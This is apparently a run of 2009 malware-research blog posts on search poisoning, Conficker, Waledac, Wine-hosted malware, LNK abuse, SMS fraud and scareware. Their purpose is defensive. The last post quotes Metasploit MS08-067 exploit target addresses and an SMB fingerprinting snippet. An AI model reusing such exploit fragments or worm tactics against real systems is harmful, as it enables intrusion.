I took the top 100 search terms for each day of this week and ran a Google search on each term.  I then considered the top 10 search results for each term, looking for poisoned links with high rankings.  Admittedly it would have been better to gather the search results on each day, rather then running the test several days after the fact, but none the less the limited results do suggest that Google took some recent actions.

The following graph shows significant activity prior to mid-day yesterday.

We can assume the attackers will be looking at new and creative ways to circumvent any countermeasures that may be in place.

Search safe.

The other day a worm, often referred to as “Error Check System” was spreading on Facebook.  In fact if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan.  Some folks blogged that this search connection was “too much of a coincidence“, and that the Facebook part of the threat was a “red herring“.  I do not believe this is the case, and here’s why.

Last week I was following up on a comment made to the McAfee Avert Labs blog.  The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan.  Running a search on part of that URL yielded hundreds of search results, many that were placed high up on Google’s results.  The summary text was relevant for the search term and it’s clear that those behind the redirects are manipulating the internet (Google); by not only getting their newly created sites to appear high on the search results page, but also to display relevant text in the page summary section, and for the hottest terms.  Here’s one example, ironically related to the recent Gmail outage.

You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

 Other searches show the results using all lowercase titles, the same as used by Google Trends.  In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (ash wednesday 2009 was the #1 search term at the time of this writing, this is image was edited to fit on the blog).

The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

Decoding the script shows that it redirects the user based on the referring URL being “google”,”msn”,”yahoo”,” comcast”,”aol.com”.  This is just one of the many ways the bad guys focus their attacks on potential victims, while making it a tiny bit more difficult for others to discover it.  Once you’re redirected, it’s situation normal for the attackers, various fake alert and scanning messages and windows appearing, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries identified by McAfee as FakeAlert-AB).

If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click, on the Web.

– Update Feb 24, 10:15 PDT –
Microsoft has released a security advisory for this issue (CVE-2009-0238):
http://www.microsoft.com/technet/security/advisory/968272.mspx

Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.
 –

A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When succesfull, it installs a backdoor that attempts to connect a remote site port 80 and waits for commands.

The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

The year 2009 has so far have a been hectic one for anti-virus vendors and IT administrators alike, “thanks” to two prolific malware families: W32/Conficker and W32/Virut. Malware researchers and field engineers have literally burned the midnight oil to ensure networks are protected against these threats.

Some of the organizations that were hit with these infections had the latest Microsoft updates installed but still got infected. During the post-mortem of the outbreaks, one glaring mistake stood out.

Administrators routinely attend to distress calls from users whenever they have an issue with their machines. By habit, the admins tend to log onto the affected workstation using their own accounts—which have domain-administrator privileges. For a moment, let us assume the suspicious user’s workstation was infected with W32/Conficker. What could possibly go wrong from here?

When the W32/Conficker worm infects a machine, it scans the local network and attempts to infect machines using the credentials of the currently logged-on user. If the initial login attempt fails, then the worm attempts a brute-force attack to authenticate, using a hardcoded list of passwords. Because most organizations have enforced complex password policies these days, brute-forcing is ineffective. But the moment the administrator logs onto the affected machine using his or her domain account, W32/Conficker runs using the elevated credentials of a domain administrator. Straight away the worm can infect any host on the domain using these newly acquired administrator credentials. Shown below is a traffic-capture screenshot of this behavior.

Upon copying the worm’s DLL to the System32 folder, W32/Conficker proceeds to create a scheduled job task to execute the worm at a predefined time. In a matter of minutes the entire network, with thousands of machines, gets infected.

It’s pretty much the same story with W32/Virut, a polymorphic entry-point-obscuring virus that spreads by infecting executable and script files. A machine infected with W32/Virut would scan and infect shared drives on the network using the credentials of the currently logged-on user. Because most domain users have limited write access to shared resources on the network, the infection is confined to a subset of machines. But the moment the administrator commits the cardinal sin of logging onto an infected machine, W32/Virut runs with elevated credentials and has write access to every C$ and Admin$ share on the network.

To prevent such an outbreak from happening, it is imperative that administrators refrain from logging onto a suspect machine using their own accounts. Logging on using the workstation’s local administrator account can also have the same effect; most corporate workstations are ghosted from the same image and could have the same local admin account and password.

An alternative is to use remote desktop solutions such as VNC, GoToAssist, or TeamViewer. These three are not tied to domain authentication. Once a suspect machine is identified, it should be isolated from the network for further investigation. Better safe than sorry

For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

• Ubuntu Linux 8.04 [comes with Gnome desktop environment]
• Wine 1.0 [run as a nonroot user with default settings]

I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

File Infectors

W32/Philis is a file infector that apart from appending its code to other executables downloads and drops other malware.

This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32″ folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

Autorun Malware

W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.

IRC Trojans

IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when ran in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot, and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

The screen shot below shows my logging into the infected Linux machine and issuing commands:

Click here for larger version of the image.

The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:

Click here for a larger version of the image.

This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

Keyloggers/Password Stealers

Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

Although stealing information using a Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DOS attack or be the origin of an infection as suggested earlier.

Scareware

This class of malware displays falsely exaggerated scan reports and tricks users into buying them. They utilize extreme social-engineering tactics combined with obfuscated Java scripts that check for exploits on the machine.

Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran a JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

Screen shots below:

Click here for a larger screen shot.

It is important to note that if the user had set the file association for Windows executables with Wine, then simply double-clicking the downloaded file would run the malware.

Mitigation Techniques

• Never run Wine applications as root.
• Wine maps the root directory, the user’s home directory, CD ROMs and removable devices found, and these mappings are listed in “~/.wine/dosdevices/”. Consider deleting these except the link to your drive_c.
• Do not set the file association for Windows executables with Wine. This would enable the running of Windows executables in Wine by simply double-clicking them.
• Administrators should think twice before installing Wine on a Linux server. These machines are seldom turned off, and so the problem that a malware faces in Wine with respect to autostarting its code when the machine boots up, I mentioned this earlier, would become void.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

Needless to further remind everyone, zero-day attacks are the preferred choice of cyber criminals and will continue to be so in 2009. If the recent W32/Conficker.worm (MS08-087) and Exploit-XMLhttp.d (MS08-078, MS09-002) were not good enough to prove our point, here is another one.

At the turn of 2009, malicious PDF documents were discovered to be exploiting a 0-day vulnerability affecting Adobe Reader 8,x and 9.x. In parsing a specially crafted embedded object, a bug in the reader allowed the attacker to overwrite memory at an arbitrary location. The attacks, found in the field, use the infamous “HeapSpray” method via JavaScript to achieve control of code execution (see below):

In the above image, the eax register is specially crafted to point to the malicious shellcode that installs a trojan. When successful, the attack installs a backdoor to enforce remote control and monitoring on infected systems. Further characteristics of this backdor and detection details are posted at http://vil.nai.com/vil/content/v_153842.htm

While the distribution of this exploit thus far appears to be targeted, new variants are expected as more information is made public. As with the Conficker experience, the lack of good patch management is a very worrying trend that deserves more attention from IT security practitioners. Adobe is expected to release a patch very soon:

http://www.adobe.com/support/security/advisories/apsa09-01.html

An exploit found to be targeting a recently patched vulnerability for Internet Explorer 7 was discovered in-the-wild.  Malware crooks were quick to develop a working exploit for the vulnerability in Internet Explorer 7, which was part of the February Microsoft patch release. Microsoft rated this vulnerability critical with the possibility of a consistent exploit code. The modus operandi bears close resemblance to the zero-day attack using word documents, we blogged about in December 2008.

The attack, delivered in the form of a maliciously crafted document, is sent out to unsuspecting users. This word document contains an embedded ActiveX control which upon opening, connects to a website hosting the MS09-002 exploit.

Malware authors are always working to create new and improved ways to evade detection and control compromised machines. This time, malware authors introduced obfuscation (base64 encoding) possibly to evade easy analysis and detection.

The ActiveX control facilitates connection to the malicious website to launch and execute the MS09-002 exploit.

For those who have not patched their machines, we suggest you install the MS09-002 patch immediately. It will just be a matter of time before different variants of this exploit start circulating in the wild and become incorporated into various Do-It-Yourself web attack toolkits.

The malicious word document is detected with the current DATS as Exploit-MSWord.k and the Internet Explorer 7 exploit is detected as Exploit-XMLhttp.d / Exploit-CVE2009-0075.

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture with two adorable Shih Tzu puppies is wishing a Happy Valentine’s Day. The text of the lure is advertizing a “Valentine Devkit” named loveexe.exe or start.exe. And regular readers can guess it already: This is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections nor downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs, plus blocked by Artemis, plus blocked at the (former Secure) Web Gateway as well.

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

Malware continues to increase at a rapid rate. With the DAT-5516 release, scheduled for 4 February, the number of drivers in the DATs will pass 500,000. Half a million is a huge amount. I remember my first antivirus program, back in the ’80s, that had a count of about 80. I don’t recall the exact number, but it’s easy to place it into perspective. We add way more on a daily basis now.

However, our current count is not an absolute number of detected malware files; this can confuse many people. Drivers can be written very specifically, say one driver for one sample, but that’s not very effective. Most drivers are written to generically detect many samples. For example, one driver can detect 50 or as many as thousands of malware files. Therefore, the number of detected malware files is way higher then the half-million number reflected in the DATs. For another look at the complexity of counting malware detections, please see François Paget’s blog as well.

Initially VirusScan would focus just on true self-replicating viruses, mainly 8-bit (.com/.exe), MS-DOS viruses as well as boot viruses, which were prevalent then–and some still are today. Malware has evolved into many areas including, but not limited to, VBA, VBScript, JavaScript, 32-bit (pe-type .exe binaries) mass-mailers, 32-bit file infectors, mobile malware, adware and password stealers, and others. Nowadays the majority of malware is static Trojans.

There has also been a big shift by the malware authors. The first malware authors were hobbyists, writing to to prove it could be done, but today we mainly see malware that’s going after the money–password stealers, etc. Malware is often developed in professional environments, much like a business project with a plan.

Although there is malware for operating systems such as Mac OSX and the various Linux/Unix versions, most malware is still targeted at Microsoft Windows and its applications.

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast amount of computers that have been controlled by zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

Shortcuts, or LNK files, are small binary files which have the path to an applications, sometimes with optional parameters. These files are used for running applications and are placed on folders where they are easy to access by users on such places as Desktops, and Application Launchers. The LNK files are also placed within the Startup folder to run automatically upon system boot. This indirect way of running applications is often attractive to malware authors as shortcuts have not been called out to most user’s attention for the sake of security as much as executable files have. At Avert Labs, we have recently seen some malware abusing shortcut files to launch malicious files/scripts in several different ways. Here, we introduce some methods we have recently seen:

1. Create shortcut files linking to malware files

This is an easy way to launch malware by a user’s actions or upon system reboot. These LNK files are created on the desktop, network shares, and even startup folders. One of the many variants of the Spy-Agent.bw trojan are known to take advantage of shortcuts to run.

2. Parasitic Infection to shortcuts

We have seen the W32/Mokaksu virus modify all LNK files on the desktop and add the path of the malware file to the original path.



The example above is the shortcut to Adobe Acrobat Reader infected with malware. The path to the malicious “Config.Msi.exe” (in the red box) is added before the original path “AcroRd32.exe” (in the yellow box). In the shortcut, the original path is treated as a parameter to the malware file. Upon clicking on the shortcut, the W32/Mokaksu malware runs as well as executing the original file, all while running in the background. Ultimately users only see the application which was associated with the shortcut launch, thereby making it much harder for users to notice the infection.

3. Scripts in the shortcuts

Shortcuts can often contain scripts for “cmd.exe” instead of linking to executable trojan files. The Downloader-BMF trojan is such a case.



When users click on these LNK files, the scripts silently creates and drops ftp scripts to then download vbs scripts from the ftp severs. The downloaded vbs scripts are then responsible for downloading trojan files.

In the first 2 cases, shortcuts are just ways of launching malware whereas in the last case, these LNK files are standalone malicious files in which no other malicious executable files are needed but a legit “cmd.exe”. This type of LNK files can be attached to emails or hosted on the web sites. This implies that we need to be more careful with LNK files. Users can easily check shortcuts by browsing the file property or viewing the file with a binary editor.

If you find suspicious strings, please do not run the files but rather send the files to Avert for further research.

It’s been a week since we’ve seen the new Mac malware, the iWork09 Trojan, which is disguised as pirated software. Since then there have been several reports about new Mac Trojans.

Before this we saw mostly lame malware for Mac OSX, but the iWork09 Trojan represents a new element to Mac Trojans — sophistication. This one contains peer to peer-like characteristics and even encrypts its traffic. It has also been associated with some recent distributed denial-of-service attacks.

One thing to remember when dealing with pirated software is that you might have a high price to pay, in this case ending up a Trojan that turns your computer into a zombie. We have seen this happen for years with Microsoft products and even with AV products. (If you search for “McAfee” on torrents sites, you will find a lot with serial numbers; but you won’t know whether the thing is a Trojan version.) Now this unfortunate trend has arrived on the Mac platform, with several reports of Trojan versions of pirated Mac applications.

Take care — you often get what you pay for.

I was dealing with customer escalations the other day and came across this interesting sample. If you believe the filename install_wrar380.exe it would install WinRar on your system, for some reason I didn’t believe it .

Upon execution, the installer displays a EULA. I have copied and pasted some of the detail below:

“THE COST OF EACH SMS FROM THE USER’S MOBILE PHONE IS TWO POUNDS. UNLESS OTHERWISE SPECIFIED, THE DOWNLOAD COST SHALL BE FOUR SMS.
Please read these USAGE CONDITIONS carefully and, if appropriate, use the download service which shall imply the express and complete acceptance of each and every one of these USAGE CONDITIONS. Otherwise, please close this website.
Netlink Network Corp. offers a PREMIUM high speed download service that is efficient and virus free. In exchange, the user shall first send two SMS under the conditions specified in clause 2.2 that defines the commercial conditions of the service”

These two sections really caught my eye. From what I understood I was going to be charged £8 in the form of 4 SMS text messages so that I can download WinRar. Alarm bells started to ring.

I clicked ‘I agree’ and was prompted for a code. To get this code, I would have to send 2 SMS text messages to 78*** (Number has been blanked out for security reasons) with the text body ‘CD’ and I would be charged £3 for each text message. This was different to what the EULA said, but as it was cheaper I wasn’t going to argue. Also note how the text is almost the same color as the background to make it difficult to see.

As I was interested to find out if it really would install WinRar, I went to my local mobile phone store and bought a mobile phone, put £10 on it and sent a text message to the number. To my surprise, I received a text back saying:

“SMS 1/3. Price per SMS: 3 Pounds. Total cost: 9 Pounds.”

It now cost me £9 instead of £6 to download some free software. This was also more than the £8 the EULA said it would cost me. I received a further 2 text messages and the final one was labelled 2/3 even though it was the 3rd. I guess they don’t have QA. You can see the text messages I received below:

I entered the code and clicked on the ‘Install’ button. The software downloaded WinRar and went on to install it for me.

I found the website which the sample came from and it displayed the following text at the bottom of the page:

“This website does not belong to any member´s program. This program should be used based on rules of intellectual property. You may obtain this program for free from the official homepage. Using or applying cracks, serials or keygens is strictly forbidden. This portal will not be held accountable for inappropriate use of the program. Your query has been sent succesfully. You will receive an answer shortly. Thank you for using our services. Due to technical issues, your query could not be sent. We apologize for the inconvenience”.

So they admit that you can download this software for free from its official homepage. They are clearly trying to trick the unsuspecting user to pay for free software.

I thought perhaps they have done this with other free software, I did some investigating and found several other websites which are registered to the same company and they offer several other pieces of free software for the small price of £6 or £9 as I found out.

I found installers for Messenger Plus! Live, WinZip, WinAce, 7Zip and several others. All of these can be downloaded for free from their official sites.

The websites are aimed at English, French and Spanish users. Luckily for our European friends, they can pay for the free software in Euro’s.

While navigating these sites, two different company names kept popping up. Netlink Network Corp and Soletto Group, S.A., I did some quick searching but couldn’t find any details on these companies.

Some of the domains had been registered as recently as late last month, so I believe we are likely to see more pop up.

I pulled all the executables I could find on the websites and added detection as SMSFraud.

Please be on the lookout for these in the future as you don’t want to pay for something which is already free.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Fake alert malware prey on innocent victims by displaying misleading scan alerts. They trick the user into buying fake antivirus, to fix such falsely exaggerated scan reports. This class of “scareware” software depends on extreme social engineering tactics and comes bundled with Backdoors, Password Stealers, Downloaders, Droppers, Browser Helper Objects, etc.

Each of the above class of malware are used either in the distribution of the fake antivirus itself or in the propogation of other kinds of malware once the fake antivirus is installed on the victim’s machine. Working towards a common goal - extorting money from an innocent victim - these scareware applications have added a new class of malware to their armory - rootkits.

Apart from hiding the scareware’s files, rootkits ensure that access to genuine security vendors’ sites is disabled. The rootkit we noticed, named “tdss[random characters].sys” was blogged about by Computer Associates recently and was associated with the AntiSpywareXP2009 scareware. We, however, noticed that this rootkit was protecting rogue components belonging to WinWebSecurity scareware. This implies that:

1. The same author of the rootkit is supplying his code to multiple scareware vendors for money, or
2. The same group is creating and distributing multiple fake antivirus.

McAfee AV, will detect & clean this rootkit component from DAT version 5496 onwards. However, a user stuck with a machine that does not have antivirus with updated signatures, will have to clean this rootkit manually.

If you are a Windows user, apart from the usual safe computing practices that include using a firewall, an updated Windows operating system and an antivirus software, consider the following steps to minimize the chances of getting infected by such scareware:

1. Install a backup software, which can revert your system to a previous known uninfected state
2. Browse the Internet from sandbox software
3. Install and browse the Internet from a Virtual Machine

On a final note, the Federal Trade Commission has recently won a restraining order against Innovative Marketing and ByteHosting Internet Services - companies responsible for marketing the scareware applications WinFixer, WinAntivirus, DriveCleaner, ErrorSafe and XP Antivirus. However, we will have to wait to see if this move actually has any impact on curbing the distribution of scareware.

Over the years, the window between exploit discovery to its incorporation into a worm candidate has shrunk from months, to weeks, to zero-day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their network. Virus authors, on the other hand, have been at the cutting edge for including exploit code in their creations whenever a critical vulnerability is reported. The chart below shows the time frame between a vulnerability being reported and how long it took for virus authors to incorporate it into a worm candidate.

The year 2007 was the only exception in recent times for a worm not exploiting any critical Microsoft vulnerability.

It’s easy for an outsider to criticize or pass judgment on a network that was hit with a zero-day worm. Spare a thought for the IT administrator; most do not have the flexibility to deploy patches immediately to the network for policy reasons. For example, the organization could be using legacy software, which could break if a new service pack was applied. And keeping these legacy applications running takes precedence over applying the latest Windows hot fixes. Most system administrators, who work in hospitals and other mission critical jobs, don’t have the luxury of doing a Windows update!

To add to these woes, every once in a while a hot fix from Microsoft breaks something in the operating system or adversely affects other applications. Once a patch is rolled out via WSUS (Windows Server Update Service) it cannot be rolled back centrally; a faulty patch from the vendor can prove costly for the organization. For these reasons administrators need more time to deploy these hot fixes in a test environment and QA them properly before deploying them to the enterprise.

So what can an administrator do in these circumstances? Relying solely on mainstream-antivirus desktop protection or firewall-style perimeter protection is insufficient to deal with today’s modern threats. The need of the hour is defense-in-depth. Administrators, who don’t have the luxury of applying patch updates, should seriously consider having a HIPS (host intrusion prevention system) installed on the end point to prevent exploit-based worm infections. Host intrusion prevention systems not only protect systems against zero-day vulnerabilities but also give administrators more time to test and deploy patches. The recent W32/Conficker.worm outbreaks could have been nipped in the bud if more organizations had chosen to protect their systems with HIPS.

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap and are using an incorrectly protected PC that you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet which seem to have been generated from Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte order conversion of data in red box above, we get 3 addresses: 0×00020408, 0×6f8917c2, 0×6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
	{

                     'Ret'       => 0x6f88f807,
                     'DisableNX' => 0x6f8917c2,
                     'Scratch'   => 0x00020408
	}
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

The latest metasploit exploit, besides including Windows XP/2003 OS’s; also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek Spanish Finnish, French, Hebrew, Japanese, Chinese, etc. The exploit module of ms08_067_netapi in metasploit also provides the “smb_fingerprint()” function to detect the Windows version information, Service Pack information and also the language information of the target OS. This makes programming the worm much easier and can cause much bigger impact. By using the exploit from the metasploit module as the code base, a virus/worm programmer only needs to implement functions for automatic downloading and spreading. We believe that this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting OS version and Service Pack information were embedded into this worm. Hence without the remote OS language determination ‘feature’, this worm only targets the English OS versions at the time of writing the blog.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending SMB session setup and request, it can detect OS information of target machine. If the OS is Windows Server 2003, then the Service Pack information will also be returned.

Since there are a huge number of Windows XP systems it’s obvious that the worm writer did not want to miss out on this pool, hence this is why the worm determines what the Service Pack level is by accessing \SRVSVC named pipe, which is similar to the method used in metasploit smb_fingerprint() function :

if (os == 'Windows XP' and sp.length == 0)
            # SRVSVC was blocked in SP2
            begin
                         smb_create("\\SRVSVC")
                         sp = 'Service Pack 0 / 1'
            rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
                         if (e.error_code == 0xc0000022)
                                 sp = 'Service Pack 2+'
                         end
            end
end

